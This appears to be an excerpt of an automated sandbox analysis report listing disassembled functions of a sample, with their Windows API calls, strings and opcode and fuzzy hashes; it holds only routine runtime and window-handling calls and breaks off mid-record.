Instruction Fuzzy Hash: 57C149729183418FC354CF29D840A5AFBE2BFC8308F19892EE998D7351D734E945DB96

Function 00FBF9D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,00FBF3A5), ref: 00FBF9DA

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 0f92bfb66de84a7f61b6ae4ae9eb2aa56d74cc4cc7f26c73342178955d8733e0
Instruction ID: ac93f1081cc9c92909a442c5236b02aaf669fa91243afb7b27f6a1d3c1061603
Opcode Fuzzy Hash: 0f92bfb66de84a7f61b6ae4ae9eb2aa56d74cc4cc7f26c73342178955d8733e0
Instruction Fuzzy Hash:

Function 00FCC030 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00FCC030

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: aadec164325814628826b7137781215eab053382a63f676c0ab4df304409350c
Instruction ID: 663ed333fa6932889419685ebbc5983fb7aa7f7ba45fafd137cd1f9ef8c90e61
Opcode Fuzzy Hash: aadec164325814628826b7137781215eab053382a63f676c0ab4df304409350c
Instruction Fuzzy Hash: F6A02430503101CFC700CF305F0C30C37D557041C070500175104C0014DF3440507701

Function 00FB62CA Relevance: .8, Instructions: 829COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
Instruction ID: b56073adb3a02cff1fb998cb596cf6b07c94b55fa05d8f066c2d228c6936c265
Opcode Fuzzy Hash: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
Instruction Fuzzy Hash: 3A62C371A047849FCB25CF29C8906F9BBE1AF95304F18896DD8DACB346D738E945DB10

Function 00FB77EF Relevance: .8, Instructions: 817COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
Instruction ID: 7ac34ecfe105a3bd83c9e2f8010a76b9e0c458774b018cbf88412c6885c6d4df
Opcode Fuzzy Hash: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
Instruction Fuzzy Hash: 1362E571A0C3858FCB15DF29C880AB9BBE1AFD5304F18896DE89A8B346D730E945DF15

Function 00FAF461 Relevance: .7, Instructions: 694COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
Instruction ID: 5fbcd61ea8df7eb4fa8e390c10a84da53be5d15e8626353d850bdb0057318827
Opcode Fuzzy Hash: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
Instruction Fuzzy Hash: 68525B72A087018FC718CF19C891A6AF7E1FFCC314F498A2DE5959B255D334EA19CB86

Function 00FB7153 Relevance: .5, Instructions: 536COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4147da1efd9960a76479b702f1ed224bb7a3271d893c4af7a3db132a9152924
Instruction ID: 2c55e996d3f8f01f1d79acdbacee4dd1137a6cf7efb4e115093c6e676636ce9d
Opcode Fuzzy Hash: a4147da1efd9960a76479b702f1ed224bb7a3271d893c4af7a3db132a9152924
Instruction Fuzzy Hash: 9112C1B16087068FC728DF29C890AB9B7E1FB94304F24492EE996C7780D734E995EF45

Function 00FAC426 Relevance: .5, Instructions: 454COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85d6eb04556eefee0f90d4246f07efa10b530eaea9ab3b3d64e9ddf7fe06075e
Instruction ID: a2237db5015e0e1e8981981b1914bf124654980c03f6424262b71976f8a788c1
Opcode Fuzzy Hash: 85d6eb04556eefee0f90d4246f07efa10b530eaea9ab3b3d64e9ddf7fe06075e
Instruction Fuzzy Hash: 6FF19CB1A083018FC718CF29C58462BBBE5FF8A764F154A2EF4C9D7351D634E945AB82

Function 00FB6CDC Relevance: .3, Instructions: 343COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 00baa3679cae877e0cd424a2601de7051aabdd7054876ff1b4d4b7fa535d7e1c
Instruction ID: 197c10fa9da6d24297361ada27b064d56af6a7e7005ebfb04fa6ab04a3ffa5d0
Opcode Fuzzy Hash: 00baa3679cae877e0cd424a2601de7051aabdd7054876ff1b4d4b7fa535d7e1c
Instruction Fuzzy Hash: 47D1B471A083818FDB14DF29C84479BBBE1BF89318F08456DE889DB242D778E905DF5A

Function 00FAE9B7 Relevance: .3, Instructions: 320COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: decfb58415360da899b3d375b6978e7df05cc490e6663c9466053cad873feae2
Instruction ID: 9890c641cc74a7c06a9e99c9e4387645eb46af35213676ade71b1c60e8c6ff9f
Opcode Fuzzy Hash: decfb58415360da899b3d375b6978e7df05cc490e6663c9466053cad873feae2
Instruction Fuzzy Hash: 66E13B755083988FC304CF19D89046ABFF0BF9A750F46095EF9D497352C235EA19EBA2

Function 00FB4088 Relevance: .3, Instructions: 270COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
Instruction ID: 453802e941c1458514b721587fb58e17236bc41e770dc6a57e4865b7086c295e
Opcode Fuzzy Hash: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
Instruction Fuzzy Hash: 9E9175B160034A9BCB24EA69DE91BFA73D4EB51300F14092CE59687283DB38B549FB52

Function 00FB43BF Relevance: .2, Instructions: 243COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
Instruction ID: d2c19cf88a9c834803dcfb955360c8a472b94907487b5b32fd83c892575e7ff6
Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
Instruction Fuzzy Hash: 5B816FB17043429BDB34DE69CED1BFD77D0AB91304F04092DE9868B283DA74A985EF52

Function 00FC51C9 Relevance: .2, Instructions: 237COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a8345950b322ccabbf366af7f03142138b0f18e1e4ff13da2574f88ca4fd424
Instruction ID: 8803079121691de0d2374a87fd2db3db7a2e3ce674cff320ebb65a10c622a576
Opcode Fuzzy Hash: 7a8345950b322ccabbf366af7f03142138b0f18e1e4ff13da2574f88ca4fd424
Instruction Fuzzy Hash: 62614122E00F4B56DB389A685F97FFE23D5EB51F60F14061EE842DB281D695BCC2B201

Function 00FC4F9A Relevance: .2, Instructions: 214COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
Instruction ID: f0f83896ac5b0187c2489758e76c7d2f6dc23957fb434bf2034b91c66f4e1600
Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
Instruction Fuzzy Hash: 5C512661E44E4756DF3845288B6BFBF27C5AB41B20F58091DE882CB282C609FDC5F295

Function 00FAEFE2 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad7ad249a5b0c59ee74070fc319877e736bd5d8e68e9db017875d259a2d43356
Instruction ID: bb25744f31cf69f8de654274ac75411b284607df623628c1058c58c5052322a9
Opcode Fuzzy Hash: ad7ad249a5b0c59ee74070fc319877e736bd5d8e68e9db017875d259a2d43356
Instruction Fuzzy Hash: 8251E3B19083D58EC701DF64C54046EBFE1AF9B324F4949AEE4D95F243C220DA4EEB62

Function 00FB00B7 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da0e890de1c7cd104905b9d6eb01196baaa7825c5fd4e42ac0d61edcdb3bfd96
Instruction ID: eb2e12f94103545ee40a92a31978879050e680efc2832dd3e7a7aba42bbb8ed4
Opcode Fuzzy Hash: da0e890de1c7cd104905b9d6eb01196baaa7825c5fd4e42ac0d61edcdb3bfd96
Instruction Fuzzy Hash: 0951DFB1A087119FC748CF19D88055AF7E1FF88354F058A2EE899E3740DB34E959CB96

Function 00FB3E0B Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
Instruction ID: 2adf4b456e2affa91b5c95f85c63f439e7247f8e41014bb4404d673652f579d5
Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
Instruction Fuzzy Hash: F831C4B1A547468FCB18DF29C8512AABBE0FB95314F10452DE495C7342C739EA0ADF91

Function 00FAE2E8 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 234COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00FAE30E

Part of subcall function 00FA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FA40A5

Part of subcall function 00FB1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00FE1030,00000200,00FAD928,00000000,?,00000050,00FE1030), ref: 00FB1DC4

_strlen.LIBCMT ref: 00FAE32F
SetDlgItemTextW.USER32(?,00FDE274,?), ref: 00FAE38F
GetWindowRect.USER32(?,?), ref: 00FAE3C9
GetClientRect.USER32(?,?), ref: 00FAE3D5
GetWindowLongW.USER32(?,000000F0), ref: 00FAE475
GetWindowRect.USER32(?,?), ref: 00FAE4A2
SetWindowTextW.USER32(?,?), ref: 00FAE4DB
GetSystemMetrics.USER32(00000008), ref: 00FAE4E3
GetWindow.USER32(?,00000005), ref: 00FAE4EE
GetWindowRect.USER32(00000000,?), ref: 00FAE51B
GetWindow.USER32(00000000,00000002), ref: 00FAE58D

Strings

CAPTION, xrefs: 00FAE4BD
$%s:, xrefs: 00FAE302
d, xrefs: 00FAE3F5

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
String ID: $%s:$CAPTION$d
API String ID: 2407758923-2512411981
Opcode ID: 5c7e3ed6f4b96cfe3462b03a7f45e3a4d2c759fab3a583a59e61e2e827a48033
Instruction ID: fbfbf305bd79d914bab1413a8e76dda5978834034e7d9a2e15e57e77624a0aca
Opcode Fuzzy Hash: 5c7e3ed6f4b96cfe3462b03a7f45e3a4d2c759fab3a583a59e61e2e827a48033
Instruction Fuzzy Hash: D38190B2608301AFD711DF68CD89AABBBE9FBCD714F04091DFA84D7240D635E9059B52

Function 00FCCB22 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00FCCB66

Part of subcall function 00FCC701: _free.LIBCMT ref: 00FCC71E
Part of subcall function 00FCC701: _free.LIBCMT ref: 00FCC730
Part of subcall function 00FCC701: _free.LIBCMT ref: 00FCC742
Part of subcall function 00FCC701: _free.LIBCMT ref: 00FCC754
Part of subcall function 00FCC701: _free.LIBCMT ref: 00FCC766
Part of subcall function 00FCC701: _free.LIBCMT ref: 00FCC778
Part of subcall function 00FCC701: _free.LIBCMT ref: 00FCC78A
Part of subcall function 00FCC701: _free.LIBCMT ref: 00FCC79C
Part of subcall function 00FCC701: _free.LIBCMT ref: 00FCC7AE
Part of subcall function 00FCC701: _free.LIBCMT ref: 00FCC7C0
Part of subcall function 00FCC701: _free.LIBCMT ref: 00FCC7D2
Part of subcall function 00FCC701: _free.LIBCMT ref: 00FCC7E4
Part of subcall function 00FCC701: _free.LIBCMT ref: 00FCC7F6

_free.LIBCMT ref: 00FCCB5B

Part of subcall function 00FC8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00FCC896,?,00000000,?,00000000,?,00FCC8BD,?,00000007,?,?,00FCCCBA,?), ref: 00FC8DE2
Part of subcall function 00FC8DCC: GetLastError.KERNEL32(?,?,00FCC896,?,00000000,?,00000000,?,00FCC8BD,?,00000007,?,?,00FCCCBA,?,?), ref: 00FC8DF4

_free.LIBCMT ref: 00FCCB7D
_free.LIBCMT ref: 00FCCB92
_free.LIBCMT ref: 00FCCB9D
_free.LIBCMT ref: 00FCCBBF
_free.LIBCMT ref: 00FCCBD2
_free.LIBCMT ref: 00FCCBE0
_free.LIBCMT ref: 00FCCBEB
_free.LIBCMT ref: 00FCCC23
_free.LIBCMT ref: 00FCCC2A
_free.LIBCMT ref: 00FCCC47
_free.LIBCMT ref: 00FCCC5F

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: d64593aa446e2b4b19ee83c120725a08c430d69e64c663c25a1ed3fd490e1edd
Instruction ID: 4181ee1074683a1479643b8c585f6384e8a080f4946d4245e4268bab7cf26583
Opcode Fuzzy Hash: d64593aa446e2b4b19ee83c120725a08c430d69e64c663c25a1ed3fd490e1edd
Instruction Fuzzy Hash: 6D314C31A002079FEB20AA78EE47F5AB7E9AF50360F15441DE18DD7192DF35AC42EB90

Function 00FB9711 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00FB9736
_wcslen.LIBCMT ref: 00FB97D6
GlobalAlloc.KERNEL32(00000040,?), ref: 00FB97E5
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00FB9806
CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00FB982D

Strings

utf-8"></head>, xrefs: 00FB976B
